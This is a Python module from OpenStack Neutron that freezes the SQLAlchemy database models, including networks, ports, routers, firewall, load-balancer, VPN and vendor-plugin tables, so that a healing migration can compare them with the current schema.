This module should not be changed.
The module provides all database models that were present at the moment of
creation of heal_script.
Its purpose is to create comparable metadata with current database schema.
Based on this comparison database can be healed with healing migration.
Current HEAD commit is 59da928e945ec58836d34fd561d30a8a446e2728
"""
import sqlalchemy as sa
from sqlalchemy.ext import declarative
from sqlalchemy.ext.orderinglist import ordering_list
from sqlalchemy import orm
from sqlalchemy import schema
from neutron.db import model_base
from neutron.openstack.common import uuidutils
# Dictionary of all tables that was renamed:
# {new_table_name: old_table_name}
renamed_tables = {
'subnetroutes': 'routes',
'cisco_credentials': 'credentials',
'cisco_nexusport_bindings': 'nexusport_bindings',
'cisco_qos_policies': 'qoss',
'tz_network_bindings': 'nvp_network_bindings',
'multi_provider_networks': 'nvp_multi_provider_networks',
'net_partitions': 'nuage_net_partitions',
'net_partition_router_mapping': 'nuage_net_partition_router_mapping',
'router_zone_mapping': 'nuage_router_zone_mapping',
'subnet_l2dom_mapping': 'nuage_subnet_l2dom_mapping',
'port_mapping': 'nuage_port_mapping',
'routerroutes_mapping': 'nuage_routerroutes_mapping',
}
#neutron/plugins/ml2/drivers/mech_arista/db.py
UUID_LEN = 36
STR_LEN = 255
#neutron/plugins/cisco/common/cisco_constants.py
CISCO_CONSTANTS_NETWORK_TYPE_VLAN = 'vlan'
CISCO_CONSTANTS_NETWORK_TYPE_OVERLAY = 'overlay'
CISCO_CONSTANTS_NETWORK_TYPE_TRUNK = 'trunk'
CISCO_CONSTANTS_NETWORK_TYPE_MULTI_SEGMENT = 'multi-segment'
CISCO_CONSTANTS_NETWORK = 'network'
CISCO_CONSTANTS_POLICY = 'policy'
CISCO_CONSTANTS_TENANT_ID_NOT_SET = 'TENANT_ID_NOT_SET'
#neutron/plugins/ml2/models.py
BINDING_PROFILE_LEN = 4095
#neutron/extensions/portbindings.py
VNIC_NORMAL = 'normal'
#neutron/common/constants.py
IPV6_SLAAC = 'slaac'
DHCPV6_STATEFUL = 'dhcpv6-stateful'
DHCPV6_STATELESS = 'dhcpv6-stateless'
BASEV2 = declarative.declarative_base(cls=model_base.NeutronBaseV2)
#neutron/db/models_v2.py
class HasTenant(object):
tenant_id = sa.Column(sa.String(255))
#neutron/db/models_v2.py
class HasId(object):
id = sa.Column(sa.String(36),
primary_key=True,
default=uuidutils.generate_uuid)
#neutron/db/models_v2.py
class HasStatusDescription(object):
status = sa.Column(sa.String(16), nullable=False)
status_description = sa.Column(sa.String(255))
#neutron/db/models_v2.py
class IPAvailabilityRange(BASEV2):
allocation_pool_id = sa.Column(sa.String(36),
sa.ForeignKey('ipallocationpools.id',
ondelete="CASCADE"),
nullable=False,
primary_key=True)
first_ip = sa.Column(sa.String(64), nullable=False, primary_key=True)
last_ip = sa.Column(sa.String(64), nullable=False, primary_key=True)
#neutron/db/models_v2.py
class IPAllocationPool(BASEV2, HasId):
subnet_id = sa.Column(sa.String(36), sa.ForeignKey('subnets.id',
ondelete="CASCADE"),
nullable=True)
first_ip = sa.Column(sa.String(64), nullable=False)
last_ip = sa.Column(sa.String(64), nullable=False)
available_ranges = orm.relationship(IPAvailabilityRange,
backref='ipallocationpool',
lazy="joined",
cascade='all, delete-orphan')
#neutron/db/models_v2.py
class IPAllocation(BASEV2):
port_id = sa.Column(sa.String(36), sa.ForeignKey('ports.id',
ondelete="CASCADE"),
nullable=True)
ip_address = sa.Column(sa.String(64), nullable=False, primary_key=True)
subnet_id = sa.Column(sa.String(36), sa.ForeignKey('subnets.id',
ondelete="CASCADE"),
nullable=False, primary_key=True)
network_id = sa.Column(sa.String(36), sa.ForeignKey("networks.id",
ondelete="CASCADE"),
nullable=False, primary_key=True)
#neutron/db/models_v2.py
class Route(object):
destination = sa.Column(sa.String(64), nullable=False, primary_key=True)
nexthop = sa.Column(sa.String(64), nullable=False, primary_key=True)
#neutron/db/models_v2.py
class SubnetRoute(BASEV2, Route):
subnet_id = sa.Column(sa.String(36),
sa.ForeignKey('subnets.id',
ondelete="CASCADE"),
primary_key=True)
#neutron/db/models_v2.py
class Port(BASEV2, HasId, HasTenant):
name = sa.Column(sa.String(255))
network_id = sa.Column(sa.String(36), sa.ForeignKey("networks.id"),
nullable=False)
fixed_ips = orm.relationship(IPAllocation, backref='ports', lazy='joined')
mac_address = sa.Column(sa.String(32), nullable=False)
admin_state_up = sa.Column(sa.Boolean(), nullable=False)
status = sa.Column(sa.String(16), nullable=False)
device_id = sa.Column(sa.String(255), nullable=False)
device_owner = sa.Column(sa.String(255), nullable=False)
#neutron/db/models_v2.py
class DNSNameServer(BASEV2):
address = sa.Column(sa.String(128), nullable=False, primary_key=True)
subnet_id = sa.Column(sa.String(36),
sa.ForeignKey('subnets.id',
ondelete="CASCADE"),
primary_key=True)
#neutron/db/models_v2.py
class Subnet(BASEV2, HasId, HasTenant):
name = sa.Column(sa.String(255))
network_id = sa.Column(sa.String(36), sa.ForeignKey('networks.id'))
ip_version = sa.Column(sa.Integer, nullable=False)
cidr = sa.Column(sa.String(64), nullable=False)
gateway_ip = sa.Column(sa.String(64))
allocation_pools = orm.relationship(IPAllocationPool,
backref='subnet',
lazy="joined",
cascade='delete')
enable_dhcp = sa.Column(sa.Boolean())
dns_nameservers = orm.relationship(DNSNameServer,
backref='subnet',
cascade='all, delete, delete-orphan')
routes = orm.relationship(SubnetRoute,
backref='subnet',
cascade='all, delete, delete-orphan')
shared = sa.Column(sa.Boolean)
ipv6_ra_mode = sa.Column(sa.Enum(IPV6_SLAAC,
DHCPV6_STATEFUL,
DHCPV6_STATELESS,
name='ipv6_ra_modes'), nullable=True)
ipv6_address_mode = sa.Column(sa.Enum(IPV6_SLAAC,
DHCPV6_STATEFUL,
DHCPV6_STATELESS,
name='ipv6_address_modes'),
nullable=True)
#neutron/db/models_v2.py
class Network(BASEV2, HasId, HasTenant):
name = sa.Column(sa.String(255))
ports = orm.relationship(Port, backref='networks')
subnets = orm.relationship(Subnet, backref='networks',
lazy="joined")
status = sa.Column(sa.String(16))
admin_state_up = sa.Column(sa.Boolean)
shared = sa.Column(sa.Boolean)
#neutron/db/agents_db.py
class Agent(BASEV2, HasId):
__table_args__ = (
sa.UniqueConstraint('agent_type', 'host',
name='uniq_agents0agent_type0host'),
)
agent_type = sa.Column(sa.String(255), nullable=False)
binary = sa.Column(sa.String(255), nullable=False)
topic = sa.Column(sa.String(255), nullable=False)
host = sa.Column(sa.String(255), nullable=False)
admin_state_up = sa.Column(sa.Boolean, default=True,
server_default=sa.sql.true(), nullable=False)
created_at = sa.Column(sa.DateTime, nullable=False)
started_at = sa.Column(sa.DateTime, nullable=False)
heartbeat_timestamp = sa.Column(sa.DateTime, nullable=False)
description = sa.Column(sa.String(255))
configurations = sa.Column(sa.String(4095), nullable=False)
#neutron/db/agentschedulers_db.py
class NetworkDhcpAgentBinding(BASEV2):
network_id = sa.Column(sa.String(36),
sa.ForeignKey("networks.id", ondelete='CASCADE'),
primary_key=True)
dhcp_agent = orm.relation(Agent)
dhcp_agent_id = sa.Column(sa.String(36),
sa.ForeignKey("agents.id",
ondelete='CASCADE'),
primary_key=True)
#neutron/db/allowedaddresspairs_db.py
class AllowedAddressPair(BASEV2):
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
mac_address = sa.Column(sa.String(32), nullable=False, primary_key=True)
ip_address = sa.Column(sa.String(64), nullable=False, primary_key=True)
port = orm.relationship(
Port,
backref=orm.backref("allowed_address_pairs",
lazy="joined", cascade="delete"))
#neutron/db/external_net_db.py
class ExternalNetwork(BASEV2):
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
primary_key=True)
network = orm.relationship(
Network,
backref=orm.backref("external", lazy='joined',
uselist=False, cascade='delete'))
#neutron/db/extradhcpopt_db.py
class ExtraDhcpOpt(BASEV2, HasId):
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
nullable=False)
opt_name = sa.Column(sa.String(64), nullable=False)
opt_value = sa.Column(sa.String(255), nullable=False)
__table_args__ = (sa.UniqueConstraint('port_id',
'opt_name',
name='uidx_portid_optname'),
BASEV2.__table_args__,)
ports = orm.relationship(
Port,
backref=orm.backref("dhcp_opts", lazy='joined', cascade='delete'))
#neutron/db/l3_db.py
class Router(BASEV2, HasId, HasTenant):
name = sa.Column(sa.String(255))
status = sa.Column(sa.String(16))
admin_state_up = sa.Column(sa.Boolean)
gw_port_id = sa.Column(sa.String(36), sa.ForeignKey('ports.id'))
gw_port = orm.relationship(Port, lazy='joined')
enable_snat = sa.Column(sa.Boolean, default=True,
server_default=sa.sql.true(), nullable=False)
#neutron/db/l3_db.py
class FloatingIP(BASEV2, HasId, HasTenant):
floating_ip_address = sa.Column(sa.String(64), nullable=False)
floating_network_id = sa.Column(sa.String(36), nullable=False)
floating_port_id = sa.Column(sa.String(36), sa.ForeignKey('ports.id'),
nullable=False)
fixed_port_id = sa.Column(sa.String(36), sa.ForeignKey('ports.id'))
fixed_ip_address = sa.Column(sa.String(64))
router_id = sa.Column(sa.String(36), sa.ForeignKey('routers.id'))
last_known_router_id = sa.Column(sa.String(36))
status = sa.Column(sa.String(16))
#neutron/db/extraroute_db.py
class RouterRoute(BASEV2, Route):
router_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id',
ondelete="CASCADE"),
primary_key=True)
router = orm.relationship(Router,
backref=orm.backref("route_list",
lazy='joined',
cascade='delete'))
#neutron/db/servicetype_db.py
class ProviderResourceAssociation(BASEV2):
provider_name = sa.Column(sa.String(255),
nullable=False, primary_key=True)
resource_id = sa.Column(sa.String(36), nullable=False, primary_key=True,
unique=True)
#neutron/db/firewall/firewall_db.py
class FirewallRule(BASEV2, HasId, HasTenant):
__tablename__ = 'firewall_rules'
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(1024))
firewall_policy_id = sa.Column(sa.String(36),
sa.ForeignKey('firewall_policies.id'),
nullable=True)
shared = sa.Column(sa.Boolean)
protocol = sa.Column(sa.String(40))
ip_version = sa.Column(sa.Integer, nullable=False)
source_ip_address = sa.Column(sa.String(46))
destination_ip_address = sa.Column(sa.String(46))
source_port_range_min = sa.Column(sa.Integer)
source_port_range_max = sa.Column(sa.Integer)
destination_port_range_min = sa.Column(sa.Integer)
destination_port_range_max = sa.Column(sa.Integer)
action = sa.Column(sa.Enum('allow', 'deny', name='firewallrules_action'))
enabled = sa.Column(sa.Boolean)
position = sa.Column(sa.Integer)
#neutron/db/firewall/firewall_db.py
class Firewall(BASEV2, HasId, HasTenant):
__tablename__ = 'firewalls'
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(1024))
shared = sa.Column(sa.Boolean)
admin_state_up = sa.Column(sa.Boolean)
status = sa.Column(sa.String(16))
firewall_policy_id = sa.Column(sa.String(36),
sa.ForeignKey('firewall_policies.id'),
nullable=True)
#neutron/db/firewall/firewall_db.py
class FirewallPolicy(BASEV2, HasId, HasTenant):
__tablename__ = 'firewall_policies'
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(1024))
shared = sa.Column(sa.Boolean)
firewall_rules = orm.relationship(
FirewallRule,
backref=orm.backref('firewall_policies', cascade='all, delete'),
order_by='FirewallRule.position',
collection_class=ordering_list('position', count_from=1))
audited = sa.Column(sa.Boolean)
firewalls = orm.relationship(Firewall, backref='firewall_policies')
#neutron/db/l3_agentschedulers_db.py
class RouterL3AgentBinding(BASEV2, HasId):
router_id = sa.Column(sa.String(36),
sa.ForeignKey("routers.id", ondelete='CASCADE'))
l3_agent = orm.relation(Agent)
l3_agent_id = sa.Column(sa.String(36),
sa.ForeignKey("agents.id",
ondelete='CASCADE'))
#neutron/db/loadbalancer/loadbalancer_db.py
class SessionPersistence(BASEV2):
vip_id = sa.Column(sa.String(36),
sa.ForeignKey("vips.id"),
primary_key=True)
type = sa.Column(sa.Enum("SOURCE_IP",
"HTTP_COOKIE",
"APP_COOKIE",
name="sesssionpersistences_type"),
nullable=False)
cookie_name = sa.Column(sa.String(1024))
#neutron/db/loadbalancer/loadbalancer_db.py
class PoolStatistics(BASEV2):
pool_id = sa.Column(sa.String(36), sa.ForeignKey("pools.id"),
primary_key=True)
bytes_in = sa.Column(sa.BigInteger, nullable=False)
bytes_out = sa.Column(sa.BigInteger, nullable=False)
active_connections = sa.Column(sa.BigInteger, nullable=False)
total_connections = sa.Column(sa.BigInteger, nullable=False)
#neutron/db/loadbalancer/loadbalancer_db.py
class Vip(BASEV2, HasId, HasTenant, HasStatusDescription):
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(255))
port_id = sa.Column(sa.String(36), sa.ForeignKey('ports.id'))
protocol_port = sa.Column(sa.Integer, nullable=False)
protocol = sa.Column(sa.Enum("HTTP", "HTTPS", "TCP", name="lb_protocols"),
nullable=False)
pool_id = sa.Column(sa.String(36), nullable=False, unique=True)
session_persistence = orm.relationship(SessionPersistence,
uselist=False,
backref="vips",
cascade="all, delete-orphan")
admin_state_up = sa.Column(sa.Boolean(), nullable=False)
connection_limit = sa.Column(sa.Integer)
port = orm.relationship(Port)
#neutron/db/loadbalancer/loadbalancer_db.py
class Member(BASEV2, HasId, HasTenant, HasStatusDescription):
__table_args__ = (
sa.schema.UniqueConstraint('pool_id', 'address', 'protocol_port',
name='uniq_member0pool_id0address0port'),
)
pool_id = sa.Column(sa.String(36), sa.ForeignKey("pools.id"),
nullable=False)
address = sa.Column(sa.String(64), nullable=False)
protocol_port = sa.Column(sa.Integer, nullable=False)
weight = sa.Column(sa.Integer, nullable=False)
admin_state_up = sa.Column(sa.Boolean(), nullable=False)
#neutron/db/loadbalancer/loadbalancer_db.py
class Pool(BASEV2, HasId, HasTenant, HasStatusDescription):
vip_id = sa.Column(sa.String(36), sa.ForeignKey("vips.id"))
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(255))
subnet_id = sa.Column(sa.String(36), nullable=False)
protocol = sa.Column(sa.Enum("HTTP", "HTTPS", "TCP", name="lb_protocols"),
nullable=False)
lb_method = sa.Column(sa.Enum("ROUND_ROBIN",
"LEAST_CONNECTIONS",
"SOURCE_IP",
name="pools_lb_method"),
nullable=False)
admin_state_up = sa.Column(sa.Boolean(), nullable=False)
stats = orm.relationship(PoolStatistics,
uselist=False,
backref="pools",
cascade="all, delete-orphan")
members = orm.relationship(Member, backref="pools",
cascade="all, delete-orphan")
monitors = orm.relationship("PoolMonitorAssociation", backref="pools",
cascade="all, delete-orphan")
vip = orm.relationship(Vip, backref='pool')
provider = orm.relationship(
ProviderResourceAssociation,
uselist=False,
lazy="joined",
primaryjoin="Pool.id==ProviderResourceAssociation.resource_id",
foreign_keys=[ProviderResourceAssociation.resource_id]
)
#neutron/db/loadbalancer/loadbalancer_db.py
class HealthMonitor(BASEV2, HasId, HasTenant):
type = sa.Column(sa.Enum("PING", "TCP", "HTTP", "HTTPS",
name="healthmontiors_type"),
nullable=False)
delay = sa.Column(sa.Integer, nullable=False)
timeout = sa.Column(sa.Integer, nullable=False)
max_retries = sa.Column(sa.Integer, nullable=False)
http_method = sa.Column(sa.String(16))
url_path = sa.Column(sa.String(255))
expected_codes = sa.Column(sa.String(64))
admin_state_up = sa.Column(sa.Boolean(), nullable=False)
pools = orm.relationship(
"PoolMonitorAssociation", backref="healthmonitor",
cascade="all", lazy="joined"
)
#neutron/db/loadbalancer/loadbalancer_db.py
class PoolMonitorAssociation(BASEV2, HasStatusDescription):
pool_id = sa.Column(sa.String(36),
sa.ForeignKey("pools.id"),
primary_key=True)
monitor_id = sa.Column(sa.String(36),
sa.ForeignKey("healthmonitors.id"),
primary_key=True)
#neutron/db/metering/metering_db.py
class MeteringLabelRule(BASEV2, HasId):
direction = sa.Column(sa.Enum('ingress', 'egress',
name='meteringlabels_direction'))
remote_ip_prefix = sa.Column(sa.String(64))
metering_label_id = sa.Column(sa.String(36),
sa.ForeignKey("meteringlabels.id",
ondelete="CASCADE"),
nullable=False)
excluded = sa.Column(sa.Boolean, default=False,
server_default=sa.sql.false())
#neutron/db/metering/metering_db.py
class MeteringLabel(BASEV2, HasId, HasTenant):
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(1024))
rules = orm.relationship(MeteringLabelRule, backref="label",
cascade="delete", lazy="joined")
routers = orm.relationship(
Router,
primaryjoin="MeteringLabel.tenant_id==Router.tenant_id",
foreign_keys='MeteringLabel.tenant_id',
uselist=True)
#neutron/db/portbindings_db.py
class PortBindingPort(BASEV2):
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
host = sa.Column(sa.String(255), nullable=False)
port = orm.relationship(
Port,
backref=orm.backref("portbinding",
lazy='joined', uselist=False,
cascade='delete'))
#neutron/db/portsecurity_db.py
class PortSecurityBinding(BASEV2):
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
port_security_enabled = sa.Column(sa.Boolean(), nullable=False)
port = orm.relationship(
Port,
backref=orm.backref("port_security", uselist=False,
cascade='delete', lazy='joined'))
#neutron/db/portsecurity_db.py
class NetworkSecurityBinding(BASEV2):
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
primary_key=True)
port_security_enabled = sa.Column(sa.Boolean(), nullable=False)
network = orm.relationship(
Network,
backref=orm.backref("port_security", uselist=False,
cascade='delete', lazy='joined'))
#neutron/db/quota_db.py
class Quota(BASEV2, HasId):
tenant_id = sa.Column(sa.String(255), index=True)
resource = sa.Column(sa.String(255))
limit = sa.Column(sa.Integer)
#neutron/db/routedserviceinsertion_db.py
class ServiceRouterBinding(BASEV2):
resource_id = sa.Column(sa.String(36),
primary_key=True)
resource_type = sa.Column(sa.String(36),
primary_key=True)
router_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id'),
nullable=False)
#neutron/db/routerservicetype_db.py
class RouterServiceTypeBinding(BASEV2):
router_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id', ondelete="CASCADE"),
primary_key=True)
service_type_id = sa.Column(sa.String(36),
nullable=False)
#neutron/db/securitygroups_db.py
class SecurityGroup(BASEV2, HasId, HasTenant):
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(255))
#neutron/db/securitygroups_db.py
class SecurityGroupPortBinding(BASEV2):
port_id = sa.Column(sa.String(36),
sa.ForeignKey("ports.id",
ondelete='CASCADE'),
primary_key=True)
security_group_id = sa.Column(sa.String(36),
sa.ForeignKey("securitygroups.id"),
primary_key=True)
# Add a relationship to the Port model in order to instruct SQLAlchemy to
# eagerly load security group bindings
ports = orm.relationship(
Port,
backref=orm.backref("security_groups",
lazy='joined', cascade='delete'))
#neutron/db/securitygroups_db.py
class SecurityGroupRule(BASEV2, HasId,
HasTenant):
security_group_id = sa.Column(sa.String(36),
sa.ForeignKey("securitygroups.id",
ondelete="CASCADE"),
nullable=False)
remote_group_id = sa.Column(sa.String(36),
sa.ForeignKey("securitygroups.id",
ondelete="CASCADE"),
nullable=True)
direction = sa.Column(sa.Enum('ingress', 'egress',
name='securitygrouprules_direction'))
ethertype = sa.Column(sa.String(40))
protocol = sa.Column(sa.String(40))
port_range_min = sa.Column(sa.Integer)
port_range_max = sa.Column(sa.Integer)
remote_ip_prefix = sa.Column(sa.String(255))
security_group = orm.relationship(
SecurityGroup,
backref=orm.backref('rules', cascade='all,delete'),
primaryjoin="SecurityGroup.id==SecurityGroupRule.security_group_id")
source_group = orm.relationship(
SecurityGroup,
backref=orm.backref('source_rules', cascade='all,delete'),
primaryjoin="SecurityGroup.id==SecurityGroupRule.remote_group_id")
#neutron/db/vpn/vpn_db.py
class IPsecPeerCidr(BASEV2):
cidr = sa.Column(sa.String(32), nullable=False, primary_key=True)
ipsec_site_connection_id = sa.Column(
sa.String(36),
sa.ForeignKey('ipsec_site_connections.id',
ondelete="CASCADE"),
primary_key=True)
#neutron/db/vpn/vpn_db.py
class IPsecPolicy(BASEV2, HasId, HasTenant):
__tablename__ = 'ipsecpolicies'
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(255))
transform_protocol = sa.Column(sa.Enum("esp", "ah", "ah-esp",
name="ipsec_transform_protocols"),
nullable=False)
auth_algorithm = sa.Column(sa.Enum("sha1",
name="vpn_auth_algorithms"),
nullable=False)
encryption_algorithm = sa.Column(sa.Enum("3des", "aes-128",
"aes-256", "aes-192",
name="vpn_encrypt_algorithms"),
nullable=False)
encapsulation_mode = sa.Column(sa.Enum("tunnel", "transport",
name="ipsec_encapsulations"),
nullable=False)
lifetime_units = sa.Column(sa.Enum("seconds", "kilobytes",
name="vpn_lifetime_units"),
nullable=False)
lifetime_value = sa.Column(sa.Integer, nullable=False)
pfs = sa.Column(sa.Enum("group2", "group5", "group14",
name="vpn_pfs"), nullable=False)
#neutron/db/vpn/vpn_db.py
class IKEPolicy(BASEV2, HasId, HasTenant):
__tablename__ = 'ikepolicies'
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(255))
auth_algorithm = sa.Column(sa.Enum("sha1",
name="vpn_auth_algorithms"),
nullable=False)
encryption_algorithm = sa.Column(sa.Enum("3des", "aes-128",
"aes-256", "aes-192",
name="vpn_encrypt_algorithms"),
nullable=False)
phase1_negotiation_mode = sa.Column(sa.Enum("main",
name="ike_phase1_mode"),
nullable=False)
lifetime_units = sa.Column(sa.Enum("seconds", "kilobytes",
name="vpn_lifetime_units"),
nullable=False)
lifetime_value = sa.Column(sa.Integer, nullable=False)
ike_version = sa.Column(sa.Enum("v1", "v2", name="ike_versions"),
nullable=False)
pfs = sa.Column(sa.Enum("group2", "group5", "group14",
name="vpn_pfs"), nullable=False)
#neutron/db/vpn/vpn_db.py
class IPsecSiteConnection(BASEV2,
HasId, HasTenant):
__tablename__ = 'ipsec_site_connections'
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(255))
peer_address = sa.Column(sa.String(255), nullable=False)
peer_id = sa.Column(sa.String(255), nullable=False)
route_mode = sa.Column(sa.String(8), nullable=False)
mtu = sa.Column(sa.Integer, nullable=False)
initiator = sa.Column(sa.Enum("bi-directional", "response-only",
name="vpn_initiators"), nullable=False)
auth_mode = sa.Column(sa.String(16), nullable=False)
psk = sa.Column(sa.String(255), nullable=False)
dpd_action = sa.Column(sa.Enum("hold", "clear",
"restart", "disabled",
"restart-by-peer", name="vpn_dpd_actions"),
nullable=False)
dpd_interval = sa.Column(sa.Integer, nullable=False)
dpd_timeout = sa.Column(sa.Integer, nullable=False)
status = sa.Column(sa.String(16), nullable=False)
admin_state_up = sa.Column(sa.Boolean(), nullable=False)
vpnservice_id = sa.Column(sa.String(36),
sa.ForeignKey('vpnservices.id'),
nullable=False)
ipsecpolicy_id = sa.Column(sa.String(36),
sa.ForeignKey('ipsecpolicies.id'),
nullable=False)
ikepolicy_id = sa.Column(sa.String(36),
sa.ForeignKey('ikepolicies.id'),
nullable=False)
ipsecpolicy = orm.relationship(
IPsecPolicy, backref='ipsec_site_connection')
ikepolicy = orm.relationship(IKEPolicy, backref='ipsec_site_connection')
peer_cidrs = orm.relationship(IPsecPeerCidr,
backref='ipsec_site_connection',
lazy='joined',
cascade='all, delete, delete-orphan')
#neutron/db/vpn/vpn_db.py
class VPNService(BASEV2, HasId, HasTenant):
name = sa.Column(sa.String(255))
description = sa.Column(sa.String(255))
status = sa.Column(sa.String(16), nullable=False)
admin_state_up = sa.Column(sa.Boolean(), nullable=False)
subnet_id = sa.Column(sa.String(36), sa.ForeignKey('subnets.id'),
nullable=False)
router_id = sa.Column(sa.String(36), sa.ForeignKey('routers.id'),
nullable=False)
subnet = orm.relationship(Subnet)
router = orm.relationship(Router)
ipsec_site_connections = orm.relationship(
IPsecSiteConnection,
backref='vpnservice',
cascade="all, delete-orphan")
#neutron/plugins/bigswitch/db/consistency_db.py
class ConsistencyHash(BASEV2):
__tablename__ = 'consistencyhashes'
hash_id = sa.Column(sa.String(255),
primary_key=True)
hash = sa.Column(sa.String(255), nullable=False)
#neutron/plugins/bigswitch/routerrule_db.py
class RouterRule(BASEV2):
id = sa.Column(sa.Integer, primary_key=True)
source = sa.Column(sa.String(64), nullable=False)
destination = sa.Column(sa.String(64), nullable=False)
nexthops = orm.relationship('NextHop', cascade='all,delete')
action = sa.Column(sa.String(10), nullable=False)
router_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id',
ondelete="CASCADE"))
#neutron/plugins/bigswitch/routerrule_db.py
class NextHop(BASEV2):
rule_id = sa.Column(sa.Integer,
sa.ForeignKey('routerrules.id',
ondelete="CASCADE"),
primary_key=True)
nexthop = sa.Column(sa.String(64), nullable=False, primary_key=True)
#neutron/plugins/brocade/db/models.py
class BrocadeNetwork(BASEV2, HasId):
vlan = sa.Column(sa.String(10))
#neutron/plugins/brocade/db/models.py
class BrocadePort(BASEV2):
port_id = sa.Column(sa.String(36), primary_key=True, default="",
server_default='')
network_id = sa.Column(sa.String(36),
sa.ForeignKey("brocadenetworks.id"),
nullable=False)
admin_state_up = sa.Column(sa.Boolean, nullable=False)
physical_interface = sa.Column(sa.String(36))
vlan_id = sa.Column(sa.String(36))
tenant_id = sa.Column(sa.String(36))
#neutron/plugins/cisco/db/n1kv_models_v2.py
class N1kvVlanAllocation(BASEV2):
__tablename__ = 'cisco_n1kv_vlan_allocations'
physical_network = sa.Column(sa.String(64),
nullable=False,
primary_key=True)
vlan_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False, default=False,
server_default=sa.sql.false())
network_profile_id = sa.Column(sa.String(36),
sa.ForeignKey('cisco_network_profiles.id',
ondelete="CASCADE"),
nullable=False)
#neutron/plugins/cisco/db/n1kv_models_v2.py
class N1kvVxlanAllocation(BASEV2):
__tablename__ = 'cisco_n1kv_vxlan_allocations'
vxlan_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False, default=False,
server_default=sa.sql.false())
network_profile_id = sa.Column(sa.String(36),
sa.ForeignKey('cisco_network_profiles.id',
ondelete="CASCADE"),
nullable=False)
#neutron/plugins/cisco/db/n1kv_models_v2.py
class N1kvPortBinding(BASEV2):
__tablename__ = 'cisco_n1kv_port_bindings'
port_id = sa.Column(sa.String(36),
sa.ForeignKey('ports.id', ondelete="CASCADE"),
primary_key=True)
profile_id = sa.Column(sa.String(36),
sa.ForeignKey('cisco_policy_profiles.id'))
#neutron/plugins/cisco/db/n1kv_models_v2.py
class N1kvNetworkBinding(BASEV2):
__tablename__ = 'cisco_n1kv_network_bindings'
network_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id', ondelete="CASCADE"),
primary_key=True)
network_type = sa.Column(sa.String(32), nullable=False)
physical_network = sa.Column(sa.String(64))
segmentation_id = sa.Column(sa.Integer)
multicast_ip = sa.Column(sa.String(32))
profile_id = sa.Column(sa.String(36),
sa.ForeignKey('cisco_network_profiles.id'))
#neutron/plugins/cisco/db/n1kv_models_v2.py
class N1kVmNetwork(BASEV2):
__tablename__ = 'cisco_n1kv_vmnetworks'
name = sa.Column(sa.String(80), primary_key=True)
profile_id = sa.Column(sa.String(36),
sa.ForeignKey('cisco_policy_profiles.id'))
network_id = sa.Column(sa.String(36))
port_count = sa.Column(sa.Integer)
#neutron/plugins/cisco/db/n1kv_models_v2.py
class NetworkProfile(BASEV2, HasId):
__tablename__ = 'cisco_network_profiles'
name = sa.Column(sa.String(255))
segment_type = sa.Column(
sa.Enum(CISCO_CONSTANTS_NETWORK_TYPE_VLAN,
CISCO_CONSTANTS_NETWORK_TYPE_OVERLAY,
CISCO_CONSTANTS_NETWORK_TYPE_TRUNK,
CISCO_CONSTANTS_NETWORK_TYPE_MULTI_SEGMENT,
name='segment_type'),
nullable=False)
sub_type = sa.Column(sa.String(255))
segment_range = sa.Column(sa.String(255))
multicast_ip_index = sa.Column(sa.Integer, default=0,
server_default='0')
multicast_ip_range = sa.Column(sa.String(255))
physical_network = sa.Column(sa.String(255))
#neutron/plugins/cisco/db/n1kv_models_v2.py
class PolicyProfile(BASEV2):
__tablename__ = 'cisco_policy_profiles'
id = sa.Column(sa.String(36), primary_key=True)
name = sa.Column(sa.String(255))
#neutron/plugins/cisco/db/n1kv_models_v2.py
class ProfileBinding(BASEV2):
__tablename__ = 'cisco_n1kv_profile_bindings'
profile_type = sa.Column(sa.Enum(CISCO_CONSTANTS_NETWORK,
CISCO_CONSTANTS_POLICY,
name='profile_type'))
tenant_id = sa.Column(sa.String(36),
primary_key=True,
default=CISCO_CONSTANTS_TENANT_ID_NOT_SET,
server_default=CISCO_CONSTANTS_TENANT_ID_NOT_SET)
profile_id = sa.Column(sa.String(36), primary_key=True)
#neutron/plugins/cisco/db/n1kv_models_v2.py
class N1kvTrunkSegmentBinding(BASEV2):
__tablename__ = 'cisco_n1kv_trunk_segments'
trunk_segment_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id',
ondelete="CASCADE"),
primary_key=True)
segment_id = sa.Column(sa.String(36), nullable=False, primary_key=True)
dot1qtag = sa.Column(sa.String(36), nullable=False, primary_key=True)
#neutron/plugins/cisco/db/n1kv_models_v2.py
class N1kvMultiSegmentNetworkBinding(BASEV2):
__tablename__ = 'cisco_n1kv_multi_segments'
multi_segment_id = sa.Column(sa.String(36),
sa.ForeignKey('networks.id',
ondelete="CASCADE"),
primary_key=True)
segment1_id = sa.Column(sa.String(36), nullable=False, primary_key=True)
segment2_id = sa.Column(sa.String(36), nullable=False, primary_key=True)
encap_profile_name = sa.Column(sa.String(36))
#neutron/plugins/cisco/db/network_models_v2.py
class QoS(BASEV2):
__tablename__ = 'cisco_qos_policies'
qos_id = sa.Column(sa.String(255))
tenant_id = sa.Column(sa.String(255), primary_key=True)
qos_name = sa.Column(sa.String(255), primary_key=True)
